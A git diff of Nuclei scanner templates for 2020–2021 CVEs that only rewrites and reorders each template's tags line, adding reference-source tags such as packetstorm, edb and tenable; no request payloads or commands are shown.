a/config/nuclei-templates/cves/2020/CVE-2020-17496.yaml b/config/nuclei-templates/cves/2020/CVE-2020-17496.yaml index 80b3891e5..ef65ec436 100644 --- a/config/nuclei-templates/cves/2020/CVE-2020-17496.yaml +++ b/config/nuclei-templates/cves/2020/CVE-2020-17496.yaml @@ -15,7 +15,7 @@ info: cvss-score: 9.8 cve-id: CVE-2020-17496 cwe-id: CWE-74 - tags: cve,cve2020,vbulletin,rce,kev + tags: vbulletin,rce,kev,tenable,seclists,cve,cve2020 requests: - raw: diff --git a/config/nuclei-templates/cves/2020/CVE-2020-17505.yaml b/config/nuclei-templates/cves/2020/CVE-2020-17505.yaml index 70b6b00ac..de43b60d3 100644 --- a/config/nuclei-templates/cves/2020/CVE-2020-17505.yaml +++ b/config/nuclei-templates/cves/2020/CVE-2020-17505.yaml @@ -14,7 +14,7 @@ info: cvss-score: 8.8 cve-id: CVE-2020-17505 cwe-id: CWE-78 - tags: cve,cve2020,rce,artica,proxy + tags: proxy,packetstorm,cve,cve2020,rce,artica requests: - raw: diff --git a/config/nuclei-templates/cves/2020/CVE-2020-17506.yaml b/config/nuclei-templates/cves/2020/CVE-2020-17506.yaml index beb9bc452..256eee559 100644 --- a/config/nuclei-templates/cves/2020/CVE-2020-17506.yaml +++ b/config/nuclei-templates/cves/2020/CVE-2020-17506.yaml @@ -14,7 +14,7 @@ info: cvss-score: 9.8 cve-id: CVE-2020-17506 cwe-id: CWE-89 - tags: cve,cve2020,artica,proxy + tags: cve,cve2020,artica,proxy,packetstorm requests: - method: GET diff --git a/config/nuclei-templates/cves/2020/CVE-2020-17518.yaml b/config/nuclei-templates/cves/2020/CVE-2020-17518.yaml index 56ca8b7d0..c6e1e8670 100644 --- a/config/nuclei-templates/cves/2020/CVE-2020-17518.yaml +++ b/config/nuclei-templates/cves/2020/CVE-2020-17518.yaml @@ -17,7 +17,7 @@ info: cvss-score: 7.5 cve-id: CVE-2020-17518 cwe-id: CWE-22 - tags: cve,cve2020,apache,lfi,flink,upload + tags: lfi,flink,upload,vulhub,cve,cve2020,apache requests: - raw: diff --git a/config/nuclei-templates/cves/2020/CVE-2020-17530.yaml b/config/nuclei-templates/cves/2020/CVE-2020-17530.yaml index 38f8bbbfa..a2f8cf438 100644 --- a/config/nuclei-templates/cves/2020/CVE-2020-17530.yaml +++ b/config/nuclei-templates/cves/2020/CVE-2020-17530.yaml @@ -16,7 +16,7 @@ info: cvss-score: 9.8 cve-id: CVE-2020-17530 cwe-id: CWE-917 - tags: cve,cve2020,apache,rce,struts,kev + tags: cve,cve2020,apache,rce,struts,kev,packetstorm requests: - method: GET diff --git a/config/nuclei-templates/cves/2020/CVE-2020-1938.yaml b/config/nuclei-templates/cves/2020/CVE-2020-1938.yaml index 10e2b372d..b09c2972e 100644 --- a/config/nuclei-templates/cves/2020/CVE-2020-1938.yaml +++ b/config/nuclei-templates/cves/2020/CVE-2020-1938.yaml @@ -17,7 +17,7 @@ info: cwe-id: CWE-269 metadata: shodan-query: title:"Apache Tomcat" - tags: cve,cve2020,apache,tomcat,lfi,network,kev,cisa + tags: cisa,tenable,cve2020,apache,lfi,network,kev,cve,tomcat network: - inputs: diff --git a/config/nuclei-templates/cves/2020/CVE-2020-2096.yaml b/config/nuclei-templates/cves/2020/CVE-2020-2096.yaml index 34593cac8..ca04c0473 100644 --- a/config/nuclei-templates/cves/2020/CVE-2020-2096.yaml +++ b/config/nuclei-templates/cves/2020/CVE-2020-2096.yaml @@ -17,7 +17,7 @@ info: cwe-id: CWE-79 metadata: shodan-query: http.title:"GitLab" - tags: cve,cve2020,jenkins,xss,gitlab,plugin + tags: jenkins,xss,gitlab,plugin,packetstorm,cve,cve2020 requests: - method: GET diff --git a/config/nuclei-templates/cves/2020/CVE-2020-22840.yaml b/config/nuclei-templates/cves/2020/CVE-2020-22840.yaml index 2f482a573..d4ac572b0 100644 --- a/config/nuclei-templates/cves/2020/CVE-2020-22840.yaml +++ b/config/nuclei-templates/cves/2020/CVE-2020-22840.yaml @@ -14,7 +14,7 @@ info: cvss-score: 6.1 cve-id: CVE-2020-22840 cwe-id: CWE-601 - tags: cve,cve2020,redirect,b2evolution + tags: packetstorm,edb,cve,cve2020,redirect,b2evolution requests: - method: GET diff --git a/config/nuclei-templates/cves/2020/CVE-2020-23575.yaml b/config/nuclei-templates/cves/2020/CVE-2020-23575.yaml index 325fde225..d525cdaed 100644 --- a/config/nuclei-templates/cves/2020/CVE-2020-23575.yaml +++ b/config/nuclei-templates/cves/2020/CVE-2020-23575.yaml @@ -14,7 +14,7 @@ info: cvss-score: 7.5 cve-id: CVE-2020-23575 cwe-id: CWE-22 - tags: cve,cve2020,printer,iot,lfi + tags: cve,cve2020,printer,iot,lfi,edb requests: - method: GET diff --git a/config/nuclei-templates/cves/2020/CVE-2020-23972.yaml b/config/nuclei-templates/cves/2020/CVE-2020-23972.yaml index 8d6884eb4..4eac0eb74 100644 --- a/config/nuclei-templates/cves/2020/CVE-2020-23972.yaml +++ b/config/nuclei-templates/cves/2020/CVE-2020-23972.yaml @@ -17,7 +17,7 @@ info: cvss-score: 7.5 cve-id: CVE-2020-23972 cwe-id: CWE-434 - tags: cve,cve2020,joomla + tags: cve,cve2020,joomla,edb,packetstorm requests: - raw: diff --git a/config/nuclei-templates/cves/2020/CVE-2020-24186.yaml b/config/nuclei-templates/cves/2020/CVE-2020-24186.yaml index 734718f8f..1107c6626 100644 --- a/config/nuclei-templates/cves/2020/CVE-2020-24186.yaml +++ b/config/nuclei-templates/cves/2020/CVE-2020-24186.yaml @@ -15,7 +15,7 @@ info: cvss-score: 10 cve-id: CVE-2020-24186 cwe-id: CWE-434 - tags: cve,cve2020,wordpress,wp-plugin,rce,upload + tags: rce,upload,packetstorm,cve,cve2020,wordpress,wp-plugin requests: - raw: diff --git a/config/nuclei-templates/cves/2020/CVE-2020-24223.yaml b/config/nuclei-templates/cves/2020/CVE-2020-24223.yaml index 99953c9cf..7ec7a3e49 100644 --- a/config/nuclei-templates/cves/2020/CVE-2020-24223.yaml +++ b/config/nuclei-templates/cves/2020/CVE-2020-24223.yaml @@ -15,7 +15,7 @@ info: cvss-score: 6.1 cve-id: CVE-2020-24223 cwe-id: CWE-79 - tags: cve,cve2020,mara,xss + tags: cve,cve2020,mara,xss,edb requests: - method: GET diff --git a/config/nuclei-templates/cves/2020/CVE-2020-24912.yaml b/config/nuclei-templates/cves/2020/CVE-2020-24912.yaml index 4e643f01c..5806510c9 100644 --- a/config/nuclei-templates/cves/2020/CVE-2020-24912.yaml +++ b/config/nuclei-templates/cves/2020/CVE-2020-24912.yaml @@ -15,7 +15,7 @@ info: cvss-score: 6.1 cve-id: CVE-2020-24912 cwe-id: CWE-79 - tags: cve,cve2020,qcubed,xss + tags: cve,cve2020,qcubed,xss,seclists requests: - method: POST diff --git a/config/nuclei-templates/cves/2020/CVE-2020-24949.yaml b/config/nuclei-templates/cves/2020/CVE-2020-24949.yaml index f498b0d7d..0840b310e 100644 --- a/config/nuclei-templates/cves/2020/CVE-2020-24949.yaml +++ b/config/nuclei-templates/cves/2020/CVE-2020-24949.yaml @@ -15,7 +15,7 @@ info: cvss-score: 8.8 cve-id: CVE-2020-24949 cwe-id: CWE-77 - tags: cve,cve2020,phpfusion,rce,php + tags: rce,php,packetstorm,cve,cve2020,phpfusion requests: - method: GET diff --git a/config/nuclei-templates/cves/2020/CVE-2020-25495.yaml b/config/nuclei-templates/cves/2020/CVE-2020-25495.yaml index b0a92310a..23cb0b698 100644 --- a/config/nuclei-templates/cves/2020/CVE-2020-25495.yaml +++ b/config/nuclei-templates/cves/2020/CVE-2020-25495.yaml @@ -15,7 +15,7 @@ info: cvss-score: 6.1 cve-id: CVE-2020-25495 cwe-id: CWE-79 - tags: cve,cve2020,sco,xss + tags: cve,cve2020,sco,xss,edb,packetstorm requests: - method: GET diff --git a/config/nuclei-templates/cves/2020/CVE-2020-25540.yaml b/config/nuclei-templates/cves/2020/CVE-2020-25540.yaml index 278a0044b..d903481ca 100644 --- a/config/nuclei-templates/cves/2020/CVE-2020-25540.yaml +++ b/config/nuclei-templates/cves/2020/CVE-2020-25540.yaml @@ -16,7 +16,7 @@ info: cvss-score: 7.5 cve-id: CVE-2020-25540 cwe-id: CWE-22 - tags: cve,cve2020,thinkadmin,lfi + tags: thinkadmin,lfi,edb,packetstorm,cve,cve2020 requests: - method: GET diff --git a/config/nuclei-templates/cves/2020/CVE-2020-26876.yaml b/config/nuclei-templates/cves/2020/CVE-2020-26876.yaml index 3908afcb5..2fdc04789 100644 --- a/config/nuclei-templates/cves/2020/CVE-2020-26876.yaml +++ b/config/nuclei-templates/cves/2020/CVE-2020-26876.yaml @@ -15,7 +15,7 @@ info: cvss-score: 7.5 cve-id: CVE-2020-26876 cwe-id: CWE-306 - tags: cve,cve2020,wordpress,wp-plugin,exposure + tags: cve,cve2020,wordpress,wp-plugin,exposure,edb requests: - method: GET diff --git a/config/nuclei-templates/cves/2020/CVE-2020-27982.yaml b/config/nuclei-templates/cves/2020/CVE-2020-27982.yaml index b39dcf48c..25499ad7a 100644 --- a/config/nuclei-templates/cves/2020/CVE-2020-27982.yaml +++ b/config/nuclei-templates/cves/2020/CVE-2020-27982.yaml @@ -17,7 +17,7 @@ info: cwe-id: CWE-79 metadata: shodan-query: title:"icewarp" - tags: cve,cve2020,xss,icewarp + tags: xss,icewarp,packetstorm,cve,cve2020 requests: - method: GET diff --git a/config/nuclei-templates/cves/2020/CVE-2020-28351.yaml b/config/nuclei-templates/cves/2020/CVE-2020-28351.yaml index e68b01ee5..626807e49 100644 --- a/config/nuclei-templates/cves/2020/CVE-2020-28351.yaml +++ b/config/nuclei-templates/cves/2020/CVE-2020-28351.yaml @@ -14,7 +14,7 @@ info: cvss-score: 6.1 cve-id: CVE-2020-28351 cwe-id: CWE-79 - tags: cve,cve2020,shoretel,xss + tags: packetstorm,cve,cve2020,shoretel,xss requests: - method: GET diff --git a/config/nuclei-templates/cves/2020/CVE-2020-28871.yaml b/config/nuclei-templates/cves/2020/CVE-2020-28871.yaml index 1d83410ac..0606da3ff 100644 --- a/config/nuclei-templates/cves/2020/CVE-2020-28871.yaml +++ b/config/nuclei-templates/cves/2020/CVE-2020-28871.yaml @@ -14,7 +14,7 @@ info: cvss-score: 9.8 cve-id: CVE-2020-28871 cwe-id: CWE-434 - tags: cve,cve2020,monitorr,rce,oast,unauth + tags: cve2020,monitorr,rce,oast,unauth,edb,cve requests: - raw: diff --git a/config/nuclei-templates/cves/2020/CVE-2020-28976.yaml b/config/nuclei-templates/cves/2020/CVE-2020-28976.yaml index 9d95ac77c..d55bcfc93 100644 --- a/config/nuclei-templates/cves/2020/CVE-2020-28976.yaml +++ b/config/nuclei-templates/cves/2020/CVE-2020-28976.yaml @@ -15,7 +15,7 @@ info: cvss-score: 5.3 cve-id: CVE-2020-28976 cwe-id: CWE-918 - tags: cve,cve2020,ssrf,wordpress,wp-plugin,oast + tags: cve,cve2020,ssrf,wordpress,wp-plugin,oast,edb requests: - method: GET diff --git a/config/nuclei-templates/cves/2020/CVE-2020-3187.yaml b/config/nuclei-templates/cves/2020/CVE-2020-3187.yaml index 4555fd630..ba9ff66e4 100644 --- a/config/nuclei-templates/cves/2020/CVE-2020-3187.yaml +++ b/config/nuclei-templates/cves/2020/CVE-2020-3187.yaml @@ -15,7 +15,7 @@ info: cvss-score: 9.1 cve-id: CVE-2020-3187 cwe-id: CWE-22 - tags: cve,cve2020,cisco + tags: cve,cve2020,cisco,packetstorm requests: - method: GET diff --git a/config/nuclei-templates/cves/2020/CVE-2020-3452.yaml b/config/nuclei-templates/cves/2020/CVE-2020-3452.yaml index 812d5a3c1..3f087aa86 100644 --- a/config/nuclei-templates/cves/2020/CVE-2020-3452.yaml +++ b/config/nuclei-templates/cves/2020/CVE-2020-3452.yaml @@ -19,7 +19,7 @@ info: cvss-score: 7.5 cve-id: CVE-2020-3452 cwe-id: CWE-20 - tags: cve,cve2020,cisco,lfi,kev + tags: lfi,kev,packetstorm,cve,cve2020,cisco requests: - method: GET diff --git a/config/nuclei-templates/cves/2020/CVE-2020-35598.yaml b/config/nuclei-templates/cves/2020/CVE-2020-35598.yaml index 41f29e3ba..0a60638f1 100644 --- a/config/nuclei-templates/cves/2020/CVE-2020-35598.yaml +++ b/config/nuclei-templates/cves/2020/CVE-2020-35598.yaml @@ -14,7 +14,7 @@ info: cvss-score: 7.5 cve-id: CVE-2020-35598 cwe-id: CWE-22 - tags: cve,cve2020,lfi,acs + tags: acs,edb,seclists,cve,cve2020,lfi requests: - method: GET diff --git a/config/nuclei-templates/cves/2020/CVE-2020-35749.yaml b/config/nuclei-templates/cves/2020/CVE-2020-35749.yaml index e2aec5174..084f2782b 100644 --- a/config/nuclei-templates/cves/2020/CVE-2020-35749.yaml +++ b/config/nuclei-templates/cves/2020/CVE-2020-35749.yaml @@ -15,7 +15,7 @@ info: cvss-score: 7.7 cve-id: CVE-2020-35749 cwe-id: CWE-22 - tags: cve,cve2020,lfi,wp,wordpress,wp-plugin,authenticated + tags: authenticated,packetstorm,wp,cve2020,lfi,wordpress,wp-plugin,wpscan,cve requests: - raw: diff --git a/config/nuclei-templates/cves/2020/CVE-2020-35951.yaml b/config/nuclei-templates/cves/2020/CVE-2020-35951.yaml index 72b76b1df..4cc26a7d6 100644 --- a/config/nuclei-templates/cves/2020/CVE-2020-35951.yaml +++ b/config/nuclei-templates/cves/2020/CVE-2020-35951.yaml @@ -14,7 +14,7 @@ info: cvss-score: 9.9 cve-id: CVE-2020-35951 cwe-id: CWE-306 - tags: cve,cve2020,wordpress,wp-plugin + tags: cve2020,wordpress,wp-plugin,wpscan,cve requests: - raw: diff --git a/config/nuclei-templates/cves/2020/CVE-2020-36112.yaml b/config/nuclei-templates/cves/2020/CVE-2020-36112.yaml index a74b3f8fa..9992ca831 100644 --- a/config/nuclei-templates/cves/2020/CVE-2020-36112.yaml +++ b/config/nuclei-templates/cves/2020/CVE-2020-36112.yaml @@ -14,7 +14,7 @@ info: cvss-score: 9.8 cve-id: CVE-2020-36112 cwe-id: CWE-89 - tags: cve,cve2020,sqli,cse + tags: cve,cve2020,sqli,cse,edb,tenable requests: - raw: diff --git a/config/nuclei-templates/cves/2020/CVE-2020-36510.yaml b/config/nuclei-templates/cves/2020/CVE-2020-36510.yaml index 5fec7dce2..9774ac692 100644 --- a/config/nuclei-templates/cves/2020/CVE-2020-36510.yaml +++ b/config/nuclei-templates/cves/2020/CVE-2020-36510.yaml @@ -16,7 +16,7 @@ info: cwe-id: CWE-79 metadata: verified: false - tags: xss,wordpress,wp-theme,wp,cve,cve2020 + tags: xss,wordpress,wp-theme,wp,cve,cve2020,wpscan requests: - method: GET diff --git a/config/nuclei-templates/cves/2020/CVE-2020-5307.yaml b/config/nuclei-templates/cves/2020/CVE-2020-5307.yaml index 41f31f1dc..91c5eaaff 100644 --- a/config/nuclei-templates/cves/2020/CVE-2020-5307.yaml +++ b/config/nuclei-templates/cves/2020/CVE-2020-5307.yaml @@ -15,7 +15,7 @@ info: cvss-score: 9.8 cve-id: CVE-2020-5307 cwe-id: CWE-89 - tags: cve,cve2020,sqli + tags: sqli,edb,cve,cve2020 requests: - raw: diff --git a/config/nuclei-templates/cves/2020/CVE-2020-5775.yaml b/config/nuclei-templates/cves/2020/CVE-2020-5775.yaml index 1df2face7..66b3cb1d1 100644 --- a/config/nuclei-templates/cves/2020/CVE-2020-5775.yaml +++ b/config/nuclei-templates/cves/2020/CVE-2020-5775.yaml @@ -13,7 +13,7 @@ info: cvss-score: 5.8 cve-id: CVE-2020-5775 cwe-id: CWE-918 - tags: cve,cve2020,ssrf,oast,blind + tags: cve,cve2020,ssrf,oast,blind,tenable requests: - method: GET diff --git a/config/nuclei-templates/cves/2020/CVE-2020-5776.yaml b/config/nuclei-templates/cves/2020/CVE-2020-5776.yaml index 8cf0dba03..4f8d47080 100644 --- a/config/nuclei-templates/cves/2020/CVE-2020-5776.yaml +++ b/config/nuclei-templates/cves/2020/CVE-2020-5776.yaml @@ -15,7 +15,7 @@ info: cwe-id: CWE-352 metadata: shodan-query: http.component:"Magento" - tags: cve,cve2020,magmi,magento + tags: magmi,magento,tenable,cve,cve2020 requests: - raw: diff --git a/config/nuclei-templates/cves/2020/CVE-2020-5777.yaml b/config/nuclei-templates/cves/2020/CVE-2020-5777.yaml index a435ffc74..6b4c111d5 100644 --- a/config/nuclei-templates/cves/2020/CVE-2020-5777.yaml +++ b/config/nuclei-templates/cves/2020/CVE-2020-5777.yaml @@ -16,7 +16,7 @@ info: cwe-id: CWE-287 metadata: shodan-query: http.component:"Magento" - tags: cve,cve2020,magmi,magento,auth,bypass,plugin + tags: plugin,tenable,cve,cve2020,magmi,magento,auth,bypass requests: - raw: diff --git a/config/nuclei-templates/cves/2020/CVE-2020-5902.yaml b/config/nuclei-templates/cves/2020/CVE-2020-5902.yaml index 5b096401a..6b48ac6d5 100644 --- a/config/nuclei-templates/cves/2020/CVE-2020-5902.yaml +++ b/config/nuclei-templates/cves/2020/CVE-2020-5902.yaml @@ -23,7 +23,7 @@ info: cvss-score: 9.8 cve-id: CVE-2020-5902 cwe-id: CWE-22,CWE-829 - tags: cve,cve2020,bigip,rce,kev + tags: cve2020,bigip,rce,kev,packetstorm,cve requests: - method: GET diff --git a/config/nuclei-templates/cves/2020/CVE-2020-7136.yaml b/config/nuclei-templates/cves/2020/CVE-2020-7136.yaml index 1702a00b9..32b67306b 100644 --- a/config/nuclei-templates/cves/2020/CVE-2020-7136.yaml +++ b/config/nuclei-templates/cves/2020/CVE-2020-7136.yaml @@ -16,7 +16,7 @@ info: cvss-score: 9.8 cve-id: CVE-2020-7136 cwe-id: CWE-288 - tags: cve,cve2020,hp,auth-bypass,hpe + tags: cve,cve2020,hp,auth-bypass,hpe,tenable requests: - raw: diff --git a/config/nuclei-templates/cves/2020/CVE-2020-7209.yaml b/config/nuclei-templates/cves/2020/CVE-2020-7209.yaml index 71e5eca07..080e2366e 100644 --- a/config/nuclei-templates/cves/2020/CVE-2020-7209.yaml +++ b/config/nuclei-templates/cves/2020/CVE-2020-7209.yaml @@ -17,7 +17,7 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2020-7209 - tags: cve,cve2020,rce + tags: cve,cve2020,rce,packetstorm requests: - method: GET diff --git a/config/nuclei-templates/cves/2020/CVE-2020-7980.yaml b/config/nuclei-templates/cves/2020/CVE-2020-7980.yaml index 2a292b48e..f801b300d 100644 --- a/config/nuclei-templates/cves/2020/CVE-2020-7980.yaml +++ b/config/nuclei-templates/cves/2020/CVE-2020-7980.yaml @@ -17,7 +17,7 @@ info: cwe-id: CWE-78 metadata: shodan-query: http.title:"Intellian Aptus Web" - tags: satellian,rce,cve,cve2020,intellian,aptus + tags: cve,cve2020,intellian,aptus,packetstorm,satellian,rce requests: - raw: diff --git a/config/nuclei-templates/cves/2020/CVE-2020-8115.yaml b/config/nuclei-templates/cves/2020/CVE-2020-8115.yaml index aecdd7b67..ecef373f7 100644 --- a/config/nuclei-templates/cves/2020/CVE-2020-8115.yaml +++ b/config/nuclei-templates/cves/2020/CVE-2020-8115.yaml @@ -14,7 +14,7 @@ info: cvss-score: 6.1 cve-id: CVE-2020-8115 cwe-id: CWE-79 - tags: cve,cve2020,xss + tags: cve,cve2020,xss,hackerone requests: - method: GET diff --git a/config/nuclei-templates/cves/2020/CVE-2020-8163.yaml b/config/nuclei-templates/cves/2020/CVE-2020-8163.yaml index bd7b8472c..db20c9beb 100644 --- a/config/nuclei-templates/cves/2020/CVE-2020-8163.yaml +++ b/config/nuclei-templates/cves/2020/CVE-2020-8163.yaml @@ -16,7 +16,7 @@ info: cvss-score: 8.8 cve-id: CVE-2020-8163 cwe-id: CWE-94 - tags: cve,cve2020,rails,rce + tags: cve,cve2020,rails,rce,hackerone requests: - method: GET diff --git a/config/nuclei-templates/cves/2020/CVE-2020-8193.yaml b/config/nuclei-templates/cves/2020/CVE-2020-8193.yaml index 102a94651..90bf83249 100644 --- a/config/nuclei-templates/cves/2020/CVE-2020-8193.yaml +++ b/config/nuclei-templates/cves/2020/CVE-2020-8193.yaml @@ -15,7 +15,7 @@ info: cvss-score: 6.5 cve-id: CVE-2020-8193 cwe-id: CWE-862 - tags: cve,cve2020,citrix,lfi,kev + tags: cve,cve2020,citrix,lfi,kev,packetstorm requests: - raw: diff --git a/config/nuclei-templates/cves/2020/CVE-2020-8512.yaml b/config/nuclei-templates/cves/2020/CVE-2020-8512.yaml index 0bd446270..95f79987d 100644 --- a/config/nuclei-templates/cves/2020/CVE-2020-8512.yaml +++ b/config/nuclei-templates/cves/2020/CVE-2020-8512.yaml @@ -17,7 +17,7 @@ info: cwe-id: CWE-79 metadata: shodan-query: title:"icewarp" - tags: cve,cve2020,xss,icewarp + tags: edb,packetstorm,cve,cve2020,xss,icewarp requests: - method: GET diff --git a/config/nuclei-templates/cves/2020/CVE-2020-8641.yaml b/config/nuclei-templates/cves/2020/CVE-2020-8641.yaml index c88ef12ff..b9c02e760 100644 --- a/config/nuclei-templates/cves/2020/CVE-2020-8641.yaml +++ b/config/nuclei-templates/cves/2020/CVE-2020-8641.yaml @@ -14,7 +14,7 @@ info: cvss-score: 8.8 cve-id: CVE-2020-8641 cwe-id: CWE-22 - tags: cve,cve2020,lfi,lotus,cms + tags: cve2020,lfi,lotus,cms,edb,cve requests: - method: GET diff --git a/config/nuclei-templates/cves/2020/CVE-2020-8654.yaml b/config/nuclei-templates/cves/2020/CVE-2020-8654.yaml index 6e915a1b2..2e8ea4441 100644 --- a/config/nuclei-templates/cves/2020/CVE-2020-8654.yaml +++ b/config/nuclei-templates/cves/2020/CVE-2020-8654.yaml @@ -15,7 +15,7 @@ info: cvss-score: 8.8 cve-id: CVE-2020-8654 cwe-id: CWE-78 - tags: cve,cve2020,cisa,eyesofnetwork,rce,authenticated + tags: cisa,eyesofnetwork,rce,authenticated,msf,cve,cve2020 requests: - method: GET diff --git a/config/nuclei-templates/cves/2020/CVE-2020-8772.yaml b/config/nuclei-templates/cves/2020/CVE-2020-8772.yaml index b38d6792e..550eaa452 100644 --- a/config/nuclei-templates/cves/2020/CVE-2020-8772.yaml +++ b/config/nuclei-templates/cves/2020/CVE-2020-8772.yaml @@ -21,7 +21,7 @@ info: cwe-id: CWE-862 metadata: verified: "true" - tags: cve,cve2020,wordpress,wp-plugin,wp,infinitewp,auth-bypass + tags: wpscan,cve,cve2020,wordpress,wp-plugin,wp,infinitewp,auth-bypass requests: - raw: diff --git a/config/nuclei-templates/cves/2020/CVE-2020-9043.yaml b/config/nuclei-templates/cves/2020/CVE-2020-9043.yaml index fd1f6a97f..e37851c70 100644 --- a/config/nuclei-templates/cves/2020/CVE-2020-9043.yaml +++ b/config/nuclei-templates/cves/2020/CVE-2020-9043.yaml @@ -18,7 +18,7 @@ info: cwe-id: CWE-200 metadata: verified: "true" - tags: cve,cve2020,wordpress,wp-plugin,wpcentral,authenticated,wp + tags: wordpress,wp-plugin,wpcentral,authenticated,wp,wpscan,cve,cve2020 requests: - raw: diff --git a/config/nuclei-templates/cves/2020/CVE-2020-9402.yaml b/config/nuclei-templates/cves/2020/CVE-2020-9402.yaml index 4c186f08e..918eada5b 100644 --- a/config/nuclei-templates/cves/2020/CVE-2020-9402.yaml +++ b/config/nuclei-templates/cves/2020/CVE-2020-9402.yaml @@ -16,7 +16,7 @@ info: cvss-score: 8.8 cve-id: CVE-2020-9402 cwe-id: CWE-89 - tags: cve,cve2020,django,sqli + tags: cve,cve2020,django,sqli,vulhub requests: - method: GET diff --git a/config/nuclei-templates/cves/2020/CVE-2020-9484.yaml b/config/nuclei-templates/cves/2020/CVE-2020-9484.yaml index 862851131..71700158d 100644 --- a/config/nuclei-templates/cves/2020/CVE-2020-9484.yaml +++ b/config/nuclei-templates/cves/2020/CVE-2020-9484.yaml @@ -23,7 +23,7 @@ info: cwe-id: CWE-502 metadata: shodan-query: title:"Apache Tomcat" - tags: cve,cve2020,apache,tomcat,rce + tags: rce,packetstorm,cve,cve2020,apache,tomcat requests: - method: GET diff --git a/config/nuclei-templates/cves/2020/CVE-2020-9496.yaml b/config/nuclei-templates/cves/2020/CVE-2020-9496.yaml index 940129f9e..d98d516ec 100644 --- a/config/nuclei-templates/cves/2020/CVE-2020-9496.yaml +++ b/config/nuclei-templates/cves/2020/CVE-2020-9496.yaml @@ -15,7 +15,7 @@ info: cvss-score: 6.1 cve-id: CVE-2020-9496 cwe-id: CWE-79,CWE-502 - tags: cve,cve2020,apache,java,ofbiz + tags: ofbiz,packetstorm,cve,cve2020,apache,java requests: - raw: diff --git a/config/nuclei-templates/cves/2021/CVE-2021-1497.yaml b/config/nuclei-templates/cves/2021/CVE-2021-1497.yaml index f0ebdbf93..d879c8c81 100644 --- a/config/nuclei-templates/cves/2021/CVE-2021-1497.yaml +++ b/config/nuclei-templates/cves/2021/CVE-2021-1497.yaml @@ -18,7 +18,7 @@ info: cvss-score: 9.8 cve-id: CVE-2021-1497 cwe-id: CWE-78 - tags: cve,cve2021,cisco,rce,oast,kev + tags: cisco,rce,oast,kev,packetstorm,cve,cve2021 requests: - raw: diff --git a/config/nuclei-templates/cves/2021/CVE-2021-1498.yaml b/config/nuclei-templates/cves/2021/CVE-2021-1498.yaml index a9cc44ff3..0d7fe3f4b 100644 --- a/config/nuclei-templates/cves/2021/CVE-2021-1498.yaml +++ b/config/nuclei-templates/cves/2021/CVE-2021-1498.yaml @@ -18,7 +18,7 @@ info: cvss-score: 9.8 cve-id: CVE-2021-1498 cwe-id: CWE-78 - tags: cve,cve2021,cisco,rce,oast,mirai,kev + tags: kev,packetstorm,cve,cve2021,cisco,rce,oast,mirai requests: - raw: diff --git a/config/nuclei-templates/cves/2021/CVE-2021-1499.yaml b/config/nuclei-templates/cves/2021/CVE-2021-1499.yaml index 02678b971..9042a697e 100644 --- a/config/nuclei-templates/cves/2021/CVE-2021-1499.yaml +++ b/config/nuclei-templates/cves/2021/CVE-2021-1499.yaml @@ -15,7 +15,7 @@ info: cvss-score: 5.3 cve-id: CVE-2021-1499 cwe-id: CWE-306 - tags: cve,cve2021,cisco,fileupload,intrusive + tags: fileupload,intrusive,packetstorm,cve,cve2021,cisco requests: - raw: diff --git a/config/nuclei-templates/cves/2021/CVE-2021-20031.yaml b/config/nuclei-templates/cves/2021/CVE-2021-20031.yaml index 57d975870..d99c6b3ea 100644 --- a/config/nuclei-templates/cves/2021/CVE-2021-20031.yaml +++ b/config/nuclei-templates/cves/2021/CVE-2021-20031.yaml @@ -17,7 +17,7 @@ info: cwe-id: CWE-601 metadata: google-dork: inurl:"auth.html" intitle:"SonicWall" - tags: cve,cve2021,sonicwall,redirect + tags: sonicwall,redirect,edb,packetstorm,cve,cve2021 requests: - raw: diff --git a/config/nuclei-templates/cves/2021/CVE-2021-20090.yaml b/config/nuclei-templates/cves/2021/CVE-2021-20090.yaml index 3f1c91547..ce45ec6f1 100644 --- a/config/nuclei-templates/cves/2021/CVE-2021-20090.yaml +++ b/config/nuclei-templates/cves/2021/CVE-2021-20090.yaml @@ -15,7 +15,7 @@ info: cvss-score: 9.8 cve-id: CVE-2021-20090 cwe-id: CWE-22 - tags: cve,cve2021,lfi,buffalo,firmware,iot,kev + tags: cve,cve2021,lfi,buffalo,firmware,iot,kev,tenable requests: - raw: diff --git a/config/nuclei-templates/cves/2021/CVE-2021-20091.yaml b/config/nuclei-templates/cves/2021/CVE-2021-20091.yaml index a17cdb0c4..c625f4b2f 100644 --- a/config/nuclei-templates/cves/2021/CVE-2021-20091.yaml +++ b/config/nuclei-templates/cves/2021/CVE-2021-20091.yaml @@ -15,7 +15,7 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H cvss-score: 8.8 cve-id: CVE-2021-20091 - tags: cve,cve2021,buffalo,firmware,iot + tags: cve,cve2021,buffalo,firmware,iot,tenable requests: - raw: diff --git a/config/nuclei-templates/cves/2021/CVE-2021-20092.yaml b/config/nuclei-templates/cves/2021/CVE-2021-20092.yaml index 7a029962c..cf0a112c2 100644 --- a/config/nuclei-templates/cves/2021/CVE-2021-20092.yaml +++ b/config/nuclei-templates/cves/2021/CVE-2021-20092.yaml @@ -15,7 +15,7 @@ info: cvss-score: 7.5 cve-id: CVE-2021-20092 cwe-id: CWE-200 - tags: cve,cve2021,buffalo,firmware,iot + tags: cve,cve2021,buffalo,firmware,iot,tenable requests: - raw: diff --git a/config/nuclei-templates/cves/2021/CVE-2021-20114.yaml b/config/nuclei-templates/cves/2021/CVE-2021-20114.yaml index cde8be2d5..5d50a6801 100644 --- a/config/nuclei-templates/cves/2021/CVE-2021-20114.yaml +++ b/config/nuclei-templates/cves/2021/CVE-2021-20114.yaml @@ -14,7 +14,7 @@ info: cvss-score: 7.5 cve-id: CVE-2021-20114 cwe-id: CWE-200 - tags: cve,cve2021,tcexam,disclosure,exposure + tags: tcexam,disclosure,exposure,tenable,cve,cve2021 requests: - method: GET diff --git a/config/nuclei-templates/cves/2021/CVE-2021-20123.yaml b/config/nuclei-templates/cves/2021/CVE-2021-20123.yaml index b767b120f..7eb2c417b 100644 --- a/config/nuclei-templates/cves/2021/CVE-2021-20123.yaml +++ b/config/nuclei-templates/cves/2021/CVE-2021-20123.yaml @@ -17,7 +17,7 @@ info: metadata: verified: true shodan-query: http.html:"VigorConnect" - tags: cve,cve2021,draytek,lfi,vigorconnect + tags: cve,cve2021,draytek,lfi,vigorconnect,tenable requests: - method: GET diff --git a/config/nuclei-templates/cves/2021/CVE-2021-20124.yaml 